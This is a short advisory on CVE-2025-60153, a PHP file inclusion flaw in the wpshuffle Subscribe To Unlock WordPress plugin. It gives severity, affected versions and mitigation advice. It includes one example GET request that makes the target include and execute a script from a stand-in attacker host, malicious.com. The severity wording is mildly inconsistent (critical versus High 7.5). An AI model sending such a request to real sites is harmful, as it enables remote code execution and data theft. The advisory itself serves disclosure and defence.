Overview
The vulnerability CVE-2025-60153 is a critical issue threatening the integrity and confidentiality of systems running wpshuffle Subscribe To Unlock. It’s an Improper Control of Filename for Include/Require Statement in PHP Program (‘PHP Remote File Inclusion’) vulnerability that allows PHP Local File Inclusion. This vulnerability matters greatly as it potentially enables system compromise or data leakage.
Vulnerability Summary
CVE ID: CVE-2025-60153
Severity: High (CVSS 7.5)
Attack Vector: Network
Privileges Required: Low
User Interaction: Required
Impact: Potential system compromise or data leakage
Affected Products
Product | Affected Versions
wpshuffle Subscribe To Unlock | n/a through 1.1.5
How the Exploit Works
The CVE-2025-60153 vulnerability exploits the PHP Remote File Inclusion feature by improperly controlling the filename for Include/Require Statement in PHP Program. An attacker can manipulate the filename to include arbitrary files from remote servers or even from the local file system. This susceptibility allows a malicious actor to inject and run code in the local context of the application, causing potential system compromise or data leakage.
Conceptual Example Code
Here is an example of how this vulnerability might be exploited:
GET /index.php?page=http://malicious.com/malicious_script.txt HTTP/1.1
Host: target.example.com
In this example, the malicious script at “http://malicious.com/malicious_script.txt” would be included and executed in the context of the target server.
Mitigation
To mitigate the CVE-2025-60153 vulnerability, affected users should apply the vendor patch as soon as it is available. In the interim, use of a Web Application Firewall (WAF) or Intrusion Detection System (IDS) can provide temporary mitigation.
